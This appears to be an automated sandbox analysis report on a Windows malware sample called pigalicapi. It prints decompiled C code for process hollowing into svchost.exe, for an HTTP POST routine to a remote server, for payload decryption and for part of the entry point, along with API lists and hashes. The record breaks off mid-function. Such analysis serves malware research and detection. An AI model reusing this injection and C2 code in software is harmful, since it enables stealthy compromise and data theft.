WinServer2003R2, xrefs: 040090D3
WinXP, xrefs: 0400904B

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: lstrcat$lstrlen$InfoSystemVersion
String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
API String ID: 3139318632-332591429
Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61

Uniqueness

Uniqueness Score: -1.00%

Function 040020B0 Relevance: 61.6, APIs: 32, Strings: 3, Instructions: 300
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
				long _v8;
				void* _v12;
				char _v276;
				struct _CONTEXT _v996;
				struct _PROCESS_INFORMATION _v1012;
				intOrPtr _v1016;
				struct _STARTUPINFOA _v1092;
				intOrPtr _v1096;
				void _v1100;
				signed int _v1104;
				CHAR* _t121;
				void* _t128;
				int _t130;
				void* _t132;
				int _t140;
				int _t143;
				int _t145;
				int _t148;
				void* _t263;
				void* _t265;
				void* _t266;

				if(_a4 == 0) {
					L26:
					return 0;
				}
				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
				if(_a12 != 0) {
					lstrcatA( &_v276, " ");
					_t121 = lstrcatA( &_v276, _a12);
				}
				E04007D20(_t121,  &_v1012, 0, 0x10);
				E04007D20( &_v1092,  &_v1092, 0, 0x44);
				_t265 = _t263 + 0x18;
				_v1092.cb = 0x44;
				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
				_v12 = _t128;
				if(_v12 != 0) {
					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
					if(_t130 != 0) {
						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
						_v1100 = _t132;
						if(_v1100 != 0) {
							L10:
							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
							_t266 = _t265 + 0xc;
							_v1104 = 0;
							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
								if((_a8 & 0x000000ff) != 0) {
									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
									_t266 = _t266 + 0xc;
								} else {
									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
									_t266 = _t266 + 0xc;
								}
								_v1104 = _v1104 + 1;
							}
							E040026D0(_v12, _v1100);
							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
							if(_t140 != 0) {
								VirtualFree(_v12, 0, 0x8000); // executed
								_v996.ContextFlags = 0x10007;
								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
								if(_t143 != 0) {
									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
									if(_t145 != 0) {
										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
										if(_t148 == 0) {
											TerminateProcess(_v1012.hProcess, 0);
											CloseHandle(_v1012.hThread);
											CloseHandle(_v1012.hProcess);
											goto L26;
										}
										ResumeThread(_v1012.hThread); // executed
										return _v1012.hProcess;
									}
									TerminateProcess(_v1012.hProcess, 0);
									CloseHandle(_v1012.hProcess);
									CloseHandle(_v1012.hThread);
									return 0;
								}
								TerminateProcess(_v1012.hProcess, 0);
								CloseHandle(_v1012.hProcess);
								CloseHandle(_v1012.hThread);
								return 0;
							}
							TerminateProcess(_v1012.hProcess, 0);
							CloseHandle(_v1012.hProcess);
							CloseHandle(_v1012.hThread);
							VirtualFree(_v12, 0, 0x8000);
							return 0;
						}
						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
						if(_v1100 != 0) {
							goto L10;
						}
						TerminateProcess(_v1012.hProcess, 0);
						CloseHandle(_v1012);
						CloseHandle(_v1012.hThread);
						VirtualFree(_v12, 0, 0x8000);
						return 0;
					}
					VirtualFree(_v12, 0, 0x8000);
					return 0;
				} else {
					return 0;
				}
			}

0x040020bd
0x04002502
0x00000000
0x04002502
0x040020d4
0x040020e6
0x040020f0
0x040020fe
0x0400210f
0x0400210f
0x04002120
0x04002133
0x04002138
0x0400213b
0x0400214e
0x04002168
0x04002177
0x04002187
0x0400218d
0x04002194
0x040021c0
0x040021c8
0x040021fe
0x04002204
0x04002211
0x0400227d
0x0400228f
0x04002294
0x04002297
0x040022b2
0x040022ce
0x0400235e
0x04002363
0x040022d0
0x04002312
0x04002317
0x04002317
0x040022ac
0x040022ac
0x04002376
0x04002396
0x0400239e
0x040023ec
0x040023f2
0x0400240a
0x04002412
0x04002460
0x04002468
0x040024a6
0x040024ba
0x040024c2
0x040024e2
0x040024ef
0x040024fc
0x00000000
0x040024fc
0x040024cb
0x00000000
0x040024d1
0x04002473
0x04002480
0x0400248d
0x00000000
0x04002493
0x0400241d
0x0400242a
0x04002437
0x00000000
0x0400243d
0x040023a9
0x040023b6
0x040023c3
0x040023d4
0x00000000
0x040023da
0x0400222d
0x0400223a
0x00000000
0x00000000
0x04002245
0x04002252
0x0400225f
0x04002270
0x00000000
0x04002276
0x040021d5
0x00000000
0x04002196
0x00000000
0x04002196

APIs

GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
lstrcatA.KERNEL32(?,00000000), ref: 0400210F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002187
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 04002227
TerminateProcess.KERNEL32(?,00000000), ref: 04002245
CloseHandle.KERNEL32(?), ref: 04002252
CloseHandle.KERNEL32(?), ref: 0400225F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270

Strings

\system32\svchost.exe, xrefs: 040020DA
SystemRoot, xrefs: 040020CF
D, xrefs: 0400213B

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
String ID: D$SystemRoot$\system32\svchost.exe
API String ID: 1819736980-1559310322
Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04004C47 Relevance: 55.0, APIs: 29, Strings: 2, Instructions: 746
memorystringencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000), ref: 04004C49
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
lstrlenA.KERNEL32(?), ref: 04005362
lstrlenA.KERNEL32(0400C5A0), ref: 04005371
wsprintfA.USER32 ref: 04005397
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,00100000), ref: 040053C2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,?,00000100), ref: 040053FD
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0400548B
EnterCriticalSection.KERNEL32(?), ref: 04005533
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005552
LeaveCriticalSection.KERNEL32(?), ref: 04005695
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040056B2
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 040056C3
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 040056D4
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 040056E5

Strings

pigalicapi, xrefs: 04005041, 04005080
, xrefs: 04004EF0

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Virtual$Free$Alloc$CriticalSectionlstrlen$BinaryByteCharCryptEnterLeaveMultiStringWidewsprintf
String ID: $pigalicapi
API String ID: 2316888505-872693435
Opcode ID: b39cc1cc03d0ade4c506769bbd2d05ca278fd1dd5e2305d6703776085187e53b
Instruction ID: bf52f896b08fb8a6114f4d2703758788ad04b625ca0fa634491eba2244ea5108
Opcode Fuzzy Hash: b39cc1cc03d0ade4c506769bbd2d05ca278fd1dd5e2305d6703776085187e53b
Instruction Fuzzy Hash: 9C529DB1D00218ABFB14DB90DC84FEDB779AF49309F08C559E6097B281E775AA84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04001840 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 260
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
				long _v8;
				char _v276;
				char _v1300;
				char _v1564;
				void* _v1568;
				void* _v1572;
				char* _v1576;
				intOrPtr _v1588;
				char* _v1592;
				signed short _v1612;
				intOrPtr _v1616;
				char* _v1620;
				void* _v1636;
				void* _v1640;
				void* _v1644;
				void* _v1648;
				long _v1652;
				void _v1656;
				void _v1916;
				long _v1920;
				long _v1924;
				long _v1928;
				void* _v1932;
				intOrPtr _v1936;
				long _v1940;
				long _v1944;
				long _v1948;
				void _v2972;
				long _v2976;
				int _t116;
				void* _t117;
				void* _t119;
				void* _t123;
				int _t133;
				void* _t143;
				long _t151;
				void* _t194;
				void* _t195;
				void* _t196;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L37:
					return _v8;
				} else {
					_v1644 = 0;
					_v1640 = 0;
					_v1568 = 0;
					_v1576 = "*/*";
					_v1572 = 0;
					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
					_t195 = _t194 + 0xc;
					_v1636 = 0x3c;
					_v1620 =  &_v1564;
					_v1616 = 0x104;
					_v1592 =  &_v276;
					_v1588 = 0x104;
					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
					if(_t116 == 0) {
						goto L37;
					}
					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
					_v1644 = _t117;
					if(_v1644 == 0) {
						goto L37;
					}
					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					_v1640 = _t119;
					if(_v1640 == 0) {
						L36:
						InternetCloseHandle(_v1644);
						goto L37;
					}
					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
					_v1568 = _t123;
					if(_v1568 == 0) {
						L35:
						InternetCloseHandle(_v1640);
						goto L36;
					}
					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
					_t196 = _t195 + 0x10;
					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
						L34:
						InternetCloseHandle(_v1568); // executed
						goto L35;
					}
					_v1656 = 0x7530;
					if(_a28 > 0) {
						_v1656 = _a28;
					}
					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
					_v1652 = 1;
					_v1648 = 0;
					do {
						_v1920 = 0x100;
						E04007D20( &_v1916,  &_v1916, 0, 0x100);
						_t196 = _t196 + 0xc;
						_v1924 = 0;
						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
						if(_t133 == 0) {
							goto L32;
						}
						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
							_t137 = E04007DD0( &_v1916);
							_t196 = _t196 + 4;
							_v1936 = _t137;
							if(_a32 != 0) {
								_t137 = _a32;
								 *_a32 = _v1936;
							}
						}
						E04007D20(_t137,  &_v1916, 0, 0x100);
						_t196 = _t196 + 0xc;
						_v1928 = 0x500000;
						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
							_t151 = E04007DD0( &_v1916);
							_t196 = _t196 + 4;
							_v1940 = _t151;
							if(_v1940 > 0 && _v1940 < 0x40000000) {
								_v1928 = _v1940;
							}
						}
						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
						_v1932 = _t143;
						if(_v1932 == 0) {
							_v2976 = 0;
							do {
								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
							} while (_v2976 > 0);
						} else {
							 *_a16 = _v1932;
							 *_a20 = _v1928;
							_v8 = 1;
							_v1944 = _v1928;
							while(1) {
								_v1948 = 0;
								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
								if(_a24 != 0) {
									 *_a24 =  *_a24 + _v1948;
								}
								if(_v1948 == 0) {
									break;
								}
								_v1932 = _v1932 + _v1948;
								_v1944 = _v1944 - _v1948;
								if(_v1944 > 0) {
									continue;
								}
								L29:
								goto L32;
							}
							goto L29;
						}
						L32:
						_v1648 = _v1648 + 1;
					} while (_v8 == 0 && _v1648 < 1);
					goto L34;
				}
			}

0x04001849
0x04001854
0x04001c95
0x04001c9b
0x04001878
0x04001878
0x04001882
0x0400188c
0x04001896
0x040018a0
0x040018b5
0x040018ba
0x040018bd
0x040018cd
0x040018d3
0x040018e3
0x040018e9
0x04001902
0x0400190a
0x00000000
0x00000000
0x0400191d
0x04001923
0x04001930
0x00000000
0x00000000
0x04001956
0x0400195c
0x04001969
0x04001c88
0x04001c8f
0x00000000
0x04001c8f
0x04001994
0x0400199a
0x040019a7
0x04001c7b
0x04001c82
0x00000000
0x04001c82
0x040019c2
0x040019c8
0x040019e5
0x04001c6e
0x04001c75
0x00000000
0x04001c75
0x040019eb
0x040019f9
0x040019fe
0x040019fe
0x04001a16
0x04001a1c
0x04001a26
0x04001a30
0x04001a30
0x04001a48
0x04001a4d
0x04001a50
0x04001a6d
0x04001a75
0x00000000
0x00000000
0x04001aa1
0x04001aaa
0x04001aaf
0x04001ab2
0x04001abc
0x04001abe
0x04001ac7
0x04001ac7
0x04001abc
0x04001ad7
0x04001adc
0x04001adf
0x04001b0f
0x04001b18
0x04001b1d
0x04001b20
0x04001b2d
0x04001b41
0x04001b41
0x04001b2d
0x04001b57
0x04001b5d
0x04001b6a
0x04001c19
0x04001c23
0x04001c3d
0x04001c43
0x04001b70
0x04001b79
0x04001b84
0x04001b86
0x04001b93
0x04001b99
0x04001b99
0x04001bbf
0x04001bc9
0x04001bd9
0x04001bd9
0x04001be2
0x00000000
0x00000000
0x04001bf2
0x04001c04
0x04001c11
0x00000000
0x04001c15
0x04001c17
0x00000000
0x04001c17
0x00000000
0x04001be4
0x04001c4c
0x04001c55
0x04001c5b
0x00000000
0x04001a30

APIs

InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
wnsprintfA.SHLWAPI ref: 040019C2
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
InternetCloseHandle.WININET(00000000), ref: 04001C75
InternetCloseHandle.WININET(00000000), ref: 04001C82
InternetCloseHandle.WININET(00000000), ref: 04001C8F

Strings

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
POST, xrefs: 04001988
Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
<, xrefs: 040018BD
0u, xrefs: 040019EB

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
API String ID: 880997049-2804282621
Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50

Uniqueness

Uniqueness Score: -1.00%

Function 040047F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v5;
				long* _v12;
				char _v28;
				char _v764;
				char _v780;
				intOrPtr _v784;
				char _v788;
				int _v792;
				int _v796;
				intOrPtr _v800;
				long* _v804;
				int _v808;
				int _v812;
				char _v816;
				int _v820;
				char _v824;
				char _v828;
				char _v844;
				int _t61;
				char* _t67;
				intOrPtr _t68;
				int _t69;
				char* _t73;
				intOrPtr _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				signed char _t78;
				void* _t109;

				_v5 = 0;
				if(_a4 == 0 || _a8 <= 0x300) {
					L25:
					return _v5;
				} else {
					_v12 = 0;
					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t61 == 0 && GetLastError() == 0x80090016) {
						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
					}
					if(_v12 != 0) {
						_v788 = 0x10;
						_v784 = 0x10;
						_v792 = 0;
						while(_v792 < _a8 - 0x2ff) {
							E04007B70( &_v780, _a4 + _v792, 0x300);
							_t109 = _t109 + 0xc;
							_t67 =  &_v780;
							_v800 = _t67;
							_v796 = 0;
							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
							if(_t67 == 0) {
								L21:
								if((_v5 & 0x000000ff) == 0) {
									_v792 = _v792 + 1;
									continue;
								}
								break;
							}
							_t68 = _v800;
							__imp__CryptHashData(_v796, _t68, 0x10, 0);
							if(_t68 != 0) {
								_v804 = 0;
								_t69 = _v796;
								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
								if(_t69 != 0) {
									_v812 = 0x2f0;
									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
									CryptDestroyKey(_v804);
									if(_v808 != 0) {
										_t73 =  &_v816;
										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
										if(_t73 != 0) {
											_t74 = _v816;
											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
											if(_t74 != 0) {
												_v820 = 0;
												_v824 = 4;
												_t76 = _v816;
												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
												if(_t76 != 0) {
													_v828 = 0x10;
													_t77 = _v816;
													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
													if(_t77 != 0) {
														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
														_t109 = _t109 + 0xc;
														if((_t78 & 0x000000ff) != 0) {
															E04007B70(_a12,  &_v780, 0x300);
															_t109 = _t109 + 0xc;
															_v5 = 1;
														}
													}
												}
											}
											__imp__CryptDestroyHash(_v816);
										}
									}
								}
							}
							__imp__CryptDestroyHash(_v796);
							goto L21;
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L25;
				}
			}

0x040047f9
0x04004801
0x04004aab
0x04004ab1
0x04004814
0x04004814
0x0400482a
0x04004832
0x04004850
0x04004850
0x0400485a
0x04004860
0x0400486a
0x04004874
0x0400488f
0x040048b9
0x040048be
0x040048c1
0x040048c7
0x040048cd
0x040048eb
0x040048f3
0x04004a90
0x04004a96
0x04004889
0x00000000
0x04004889
0x00000000
0x04004a98
0x040048fd
0x0400490b
0x04004913
0x04004919
0x0400492c
0x0400493c
0x04004944
0x0400494a
0x04004975
0x04004982
0x0400498f
0x04004995
0x040049a9
0x040049b1
0x040049c5
0x040049cc
0x040049d4
0x040049da
0x040049e4
0x04004a00
0x04004a07
0x04004a0f
0x04004a11
0x04004a2d
0x04004a34
0x04004a3c
0x04004a4b
0x04004a50
0x04004a58
0x04004a6a
0x04004a6f
0x04004a72
0x04004a72
0x04004a58
0x04004a3c
0x04004a0f
0x04004a7d
0x04004a7d
0x040049b1
0x0400498f
0x04004944
0x04004a8a
0x00000000
0x04004a8a
0x04004aa5
0x04004aa5
0x00000000
0x0400485a

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
GetLastError.KERNEL32 ref: 04004834
CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 2739279601-947817771
Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04003B00 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 302
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			_entry_() {
				intOrPtr _v8;
				char _v1148;
				signed char _v1149;
				intOrPtr _v1156;
				char _v1556;
				char _v9556;
				long _v9560;
				char _v9564;
				char _v12068;
				signed int _v12072;
				char _v12076;
				long _v12080;
				char _v12081;
				long _v12088;
				long _v12092;
				long _v12096;
				signed int _v12100;
				signed char _v12101;
				long _v12108;
				signed int _v12112;
				void* _v12116;
				signed char _t69;
				intOrPtr _t74;
				signed char _t77;
				signed char _t79;
				signed int _t80;
				signed char _t85;
				signed char _t86;
				signed char _t87;
				intOrPtr _t88;
				char* _t89;
				signed int _t97;
				void* _t98;
				signed int _t100;
				signed char _t102;
				signed char _t104;
				signed char _t106;
				signed char _t110;
				signed int _t116;
				signed int _t118;
				char _t125;
				signed int _t138;
				signed int _t140;
				intOrPtr _t143;
				signed int _t159;
				signed int _t161;
				void* _t163;
				void* _t165;
				void* _t173;
				void* _t177;

				E04001000(0x2f50);
				_v8 = E04003130();
				E04002ED0(_v8);
				GetModuleFileNameA(0, "C:\Users\alfons\pigalicapi.exe", 0x208);
				SetUnhandledExceptionFilter(E04005DB0); // executed
				__imp__CoInitialize(0); // executed
				_t69 = E04004510(_v8, 0x4013c88); // executed
				_t165 = _t163 + 0xc;
				if((_t69 & 0x000000ff) == 0) {
					L39:
					ExitProcess(0);
				}
				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
				E04005700( &_v1148); // executed
				_t143 =  *0x40118a0; // 0x4013b88
				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
				_v1156 = _t74;
				E04007D20(_t74, "Hogerfazwafx", 0, 0x12c);
				E04009400( &_v1148, "Hogerfazwafx", 0xa); // executed
				_t77 = E040099F0(); // executed
				 *0x401435a = _t77;
				 *0x401435d = E04006060(); // executed
				_t79 = E04005E00(); // executed
				 *0x401435e = _t79;
				_t80 = StrStrIA("C:\Users\alfons\pigalicapi.exe", "svchost.exe"); // executed
				asm("sbb eax, eax");
				 *0x4014362 =  ~( ~_t80);
				E04001120("C:\Users\alfons\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
				_t85 = E04005E30(0); // executed
